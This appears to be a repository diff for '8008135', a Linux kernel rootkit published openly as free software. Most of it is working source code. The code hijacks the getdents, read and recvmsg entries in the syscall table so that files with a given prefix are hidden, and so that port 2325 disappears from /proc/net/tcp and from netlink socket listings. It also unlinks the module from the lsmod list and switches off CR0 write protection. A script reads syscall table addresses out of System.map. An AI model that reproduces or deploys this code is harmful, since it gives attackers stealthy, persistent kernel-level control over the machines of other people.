if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) {
#if defined DEBUG
printk("\n hide prefix or mod name contained!\n");
printk("\n ret %ld\n ", ret);
printk("\n dbuf %d\n" , dbuf);
printk("\n");
printk(ent->d_name);
#endif
// remove this entry by copying everything after it forward
// and adjust the length reported
#if defined DEBUG
printk("\n reclen %u \n", ent->d_reclen);
#endif
memcpy(dbuf + boff,
dbuf + boff + ent->d_reclen,
ret - (boff + ent->d_reclen));
ret -= ent->d_reclen;
#if defined DEBUG
printk("\n ret after change %ld\n ", ret);
#endif
} else {
// on to the next entry
boff += ent->d_reclen;
}
}
return ret;
}
/*** FUNCTION ****************************************************************
* NAME: 8008135_init
* DESCRIPTION: initializing Kernel Module
* DESCRIPTION: initializing Kernel Module - hijacking syscalltable
* PARAMETERS: -
* RETURNS: int
*******************************************************************************/
static int __init init_8008135(void) {
printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
// record the original getdents handler
sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM];
printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig);
// turn write protect off
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// add our new handlers
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents];
sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read];
sys_recvmsg_orig = (void *) sys_call_table[__NR_recvmsg];
// turn write protect back on
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
wprotectionoff();
printk(KERN_INFO "New syscall in place\n");
sys_call_table[__NR_getdents] = sys_getdents_new;
sys_call_table[__NR_read] = sys_read_fake;
sys_call_table[__NR_recvmsg] = my_recvmsg_syscall;
wprotectionon();
network_server_init();
hide_module();
return 0;
}
/*** FUNCTION ****************************************************************
* NAME: 8008135_exit
* DESCRIPTION: unloading Kernel Module
* DESCRIPTION: unloading Kernel Module, restoring the original system call table
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
static void __exit exit_8008135(void) {
// allow us to write to read onlu pages
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// set getdents handler back
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
// turn write protect back on
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
printk(KERN_INFO "Old syscall back\n");
network_server_exit();
wprotectionoff();
sys_call_table[__NR_getdents] = sys_getdents_orig;
sys_call_table[__NR_read] = sys_read_orig;
sys_call_table[__NR_recvmsg] = sys_recvmsg_orig;
wprotectionon();
}
// Setting pointers to init-/exit-functions
/*******************************************************************************/
module_init(init_8008135);
module_exit(exit_8008135);
/*******************************************************************************/

19
src/create_sysgen.sh → src/cr3473_5y563n.sh
View File

@ -1,19 +1,32 @@
#!/usr/bin/env bash
SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )"
SRCS_H="$SCRIPTPATH""/headers"
SGENH="$SRCS_H""/sysgen.h"
SGENS="$SCRIPTPATH""/5y563n.c"
SGENH="$SRCS_H""/5y563n.h"
smap="/boot/System.map-$(uname -r)"
echo -e '#include "5y563n.h"' > "$SGENS"
echo -e "#pragma once" > "$SGENH"
echo -e "#include <linux/fs.h>" >> "$SGENH"
symbline=$(cat $smap | grep '\Wsys_call_table$')
set $symbline
[ -z "$symbline" ] && echo "No SysCall Table Value from System.map found" && exit 2;
echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENH"
echo -e "extern void** sys_call_table;" >> "$SGENH"
echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENS"
procline=$(cat $smap | grep '\Wproc_modules_operations$')
set $procline
echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENH"
echo -e "extern struct file_operations* proc_modules_operations;">> "$SGENH"
echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENS"

36
src/h1d3m0dul3.c Normal file
View File

@ -0,0 +1,36 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "h1d3m0dul3.h"
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: hide_module
* DESCRIPTION: hides the module from lsmod
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void hide_module(void){
list_del(&THIS_MODULE->list);
}

185
src/h1d3p0r7.c Normal file
View File

@ -0,0 +1,185 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "h1d3p0r7.h"
/**** var **********************************************************************
*******************************************************************************/
sys_read_ptr sys_read_orig;
original_recvmsg_syscall sys_recvmsg_orig;
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: hide port
* DESCRIPTION: hides the port 2325
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
size_t count)
{
long result, bp, diff_in_bytes;
char *kbuf, *start_line, *end_line, *port_num;
char *pathname, pbuf[256];
struct files_struct *current_files;
struct fdtable *files_table;
struct path file_path;
// run real read
result = (*sys_read_orig)(fd, buf, count);
if (result <= 0){
return result;
}
current_files = current->files;
files_table = files_fdtable(current_files);
file_path = files_table->fd[fd]->f_path;
pathname = d_path(&file_path, pbuf, 256*sizeof(char));
if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) {
if (!access_ok(VERIFY_READ, buf, result)){
return -1;
}
if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){
return -1;
}
if (copy_from_user(kbuf, buf, result)){
return -1;
}
start_line = strchr(kbuf, ':') - 4;
diff_in_bytes = (start_line - kbuf) * sizeof(char);
for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
start_line = kbuf + bp;
port_num = strchr(strchr(start_line, ':') + 1, ':') + 1;
end_line = strchr(start_line, '\n');
diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) {
memmove(start_line, end_line + 1,
result - bp - diff_in_bytes);
result -= diff_in_bytes;
}
}
// copy from kernel to userspace
if (!access_ok(VERIFY_WRITE, buf, result)){
return EINVAL;
}
if (copy_to_user(buf, kbuf, result)){
return EINVAL;
}
kfree(kbuf);
}
// return number of bytes read
return result;
}
/* Function that replaces the original `recvmsg` syscall. Initially, it calls the original
`recvmsg` which fills the given msg buffer. We realize whether we are reading from a netlink
socket with the help of some netlink utility macros. If a netlink socket is being used, we
iterate through the inet diag msg structs (each prepended by a nlmsghdr) and compare the
source and destination ports with our list of hidden ones. In order to hide an entry we copy
the remaining entries over it and adjust the data length which is returned to the user. */
asmlinkage ssize_t my_recvmsg_syscall(int sockfd, struct user_msghdr __user *msg, unsigned flags)
{
long ret;
struct nlmsghdr *nlh;
long count;
int found;
char *stream;
int offset;
int i;
struct inet_diag_msg *r;
int port;
/* Call original `recvmsg` syscall */
ret = sys_recvmsg_orig(sockfd, msg, flags);
/* Some error occured. Don't do anything. */
if (ret < 0)
return ret;
/* Extract netlink message header from message */
nlh = (struct nlmsghdr *)(msg->msg_iov->iov_base);
/* Number of bytes remaining in message stream */
count = ret;
/* Set flag specifying whether message contains data to be masked */
found = 1;
/* NLMSG_OK: This macro will return true if a netlink message was received. It
essentially checks whether it's safe to parse the netlink message (if indeed
is a netlink message) using the other NLMSG_* macros. */
while (NLMSG_OK(nlh, count)) {
if (found == 0)
/* NLMSG_NEXT: Many netlink protocols have request messages that result
in multiple response messages. In these cases, multiple responses will
be copied into the `msg` buffer. This macro can be used to walk the
chain of responses. Returns NULL in the event the message is the last
in the chain for the given buffer. */
nlh = NLMSG_NEXT(nlh, count);
r = NLMSG_DATA(nlh);
port = ntohs(r->id.idiag_sport);
if(port == 2325){
/* Message contains data to be masked */
found = 1;
}else{
found = 0;
continue;
}
stream = (char *) nlh;
/* NLMSG_ALIGN: This macro accepts the length of a netlink message and rounds it
up to the nearest NLMSG_ALIGNTO boundary. It returns the rounded length. */
offset = NLMSG_ALIGN((nlh)->nlmsg_len);
/* Copy remaining entries over the data to be masked */
for (i=0 ; i<count ; i++)
stream[i] = stream[i + offset];
/* Adjust the data length */
ret -= offset;
}
return ret;
}

54
src/headers/50ck3t.h Normal file
View File

@ -0,0 +1,54 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_50CK3T_H
#define SRC_HEADERS_50CK3T_H
/**** includes *****************************************************************
*******************************************************************************/
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/kthread.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/netdevice.h>
#include <linux/ip.h>
#include <linux/in.h>
#include <linux/unistd.h>
#include <linux/wait.h>
#include <net/sock.h>
#include <net/tcp.h>
#include <net/inet_connection_sock.h>
#include <net/request_sock.h>
/**** defines *****************************************************************
*******************************************************************************/
#define DEFAULT_PORT 2325
#define DEFAULT_PORT_HEX "0915"
#define MAX_CONNS 16
#define MODULE_NAME "8008135"
int network_server_init(void);
void network_server_exit(void);
#endif

13
src/headers/610b415.h Normal file
View File

@ -0,0 +1,13 @@
/*
* 610b415.h
*
* Created on: Dec 6, 2019
* Author: vlr
*/
#ifndef SRC_HEADERS_610B415_H_
#define SRC_HEADERS_610B415_H_
extern char * stringRemoveChars(char *AString, char *ASpanset);
#endif /* SRC_HEADERS_610B415_H_ */

68
src/headers/637d3n75.h Normal file
View File

@ -0,0 +1,68 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
#ifndef SRC_HEADERS_637d3n75_H
#define SRC_HEADERS_637d3n75_H
/**** include ****************************************************************
*******************************************************************************/
#include <linux/module.h>
#include <asm/special_insns.h>
#include <linux/string.h>
#include <linux/fs.h>
#include "5y563n.h"
#define HIDE_PREFIX "8008135."
#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1)
#define MODULE_NAME "8008135"
#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
#define __NR_getdents 78
/**** type ********************************************************************
******************************************************************************/
struct linux_dirent {
unsigned long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[1];
};
typedef asmlinkage long (*sys_getdents_ptr)(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count);
/*** var ********************************************************************
*******************************************************************************/
extern sys_getdents_ptr sys_getdents_orig;
extern asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count);
#endif

49
src/headers/8008135.h
View File

@ -18,49 +18,44 @@
*/
#ifndef SRC_HEADERS_8008135_H
#define SRC_HEADERS_8008135_H
/**** Includes ***************************************************************
*******************************************************************************/
#include "637d3n75.h"
#include "50ck3t.h"
#include "h1d3m0dul3.h"
#include "h1d3p0r7.h"
#include "p463unpr073c7.h"
// To set module data
#include <linux/module.h>
// To communicate kernel
#include <linux/kernel.h>
/*
#include <linux/kallsyms.h>
#include <asm/special_insns.h>
#include <linux/string.h>
#include <linux/fs.h>
#include "sysgen.h"
#include <linux/fdtable.h>
#include <linux/net.h>
#include <linux/seq_file.h>
#include <linux/slab.h>
#include <linux/socket.h>
#include <linux/version.h>
#include <net/tcp.h>
#include <net/udp.h>
*/
/**** Defines *****************************************************************
*******************************************************************************/
#define GETDENTS_SYSCALL_NUM 78
#define WRITE_PROTECT_FLAG (1<<16)
#define HIDE_PREFIX "8008135."
#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1)
#define MODULE_NAME "8008135"
#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
/**** Modinfo ****************************************************************
*******************************************************************************/
MODULE_LICENSE("GPLv3");
MODULE_LICENSE("GPL");
MODULE_AUTHOR("JanKoernerEnterprises");
MODULE_DESCRIPTION("8008135");
MODULE_VERSION("0.1");
/**** type *******************************************************************
*******************************************************************************/
struct linux_dirent {
unsigned long d_ino;
unsigned long d_off;
unsigned short d_reclen; // d_reclen is the way to tell the length of this entry
char d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
};
typedef asmlinkage long (*sys_getdents_t)(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count);
#endif /* SRC_HEADERS_8008135_H */
#endif

30
src/headers/h1d3m0dul3.h Normal file
View File

@ -0,0 +1,30 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_h1d3m0dul3_H
#define SRC_HEADERS_h1d3m0dul3_H
#include <linux/module.h>
#include <linux/kernel.h>
extern void hide_module(void);
#endif

62
src/headers/h1d3p0r7.h Normal file
View File

@ -0,0 +1,62 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_h1d3p0r7_H
#define SRC_HEADERS_h1d3p0r7_H
/**** includes ****************************************************************
*******************************************************************************/
#include "50ck3t.h"
/* are those really all needed? */
#include <linux/fs.h>
#include <linux/fdtable.h>
#include <linux/net.h>
#include <linux/seq_file.h>
#include <linux/slab.h>
#include <linux/socket.h>
#include <linux/version.h>
#include <net/tcp.h>
#include <net/udp.h>
#include <linux/inet_diag.h> /* Needed for ntohs */
#define __NR_read 0
#define __NR_recvmsg 47
typedef asmlinkage long (*sys_read_ptr)(unsigned int fd,
char __user *buf,
size_t count);
typedef asmlinkage ssize_t (*original_recvmsg_syscall)(int, struct user_msghdr __user *, unsigned);
/**** var **********************************************************************
*******************************************************************************/
extern sys_read_ptr sys_read_orig;
extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
size_t count);
extern original_recvmsg_syscall sys_recvmsg_orig;
extern asmlinkage ssize_t my_recvmsg_syscall(int, struct user_msghdr __user *, unsigned);
#endif

33
src/headers/p463unpr073c7.h Normal file
View File

@ -0,0 +1,33 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_p463unpr073c7_H
#define SRC_HEADERS_p463unpr073c7_H
#include <linux/module.h>
#include "asm/special_insns.h"
/**** defines *****************************************************************
*******************************************************************************/
#define WRITE_PROTECT_FLAG (1<<16)
extern void wprotectionoff(void);
extern void wprotectionon(void);
#endif

48
src/p463unpr073c7.c Normal file
View File

@ -0,0 +1,48 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "p463unpr073c7.h"
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: wprotectionoff
* DESCRIPTION: turn page write protection off
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void wprotectionoff(void){
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
}
/*** FUNCTION ****************************************************************
* NAME: wprotectionon
* DESCRIPTION: turn page write protection on
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void wprotectionon(void){
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
}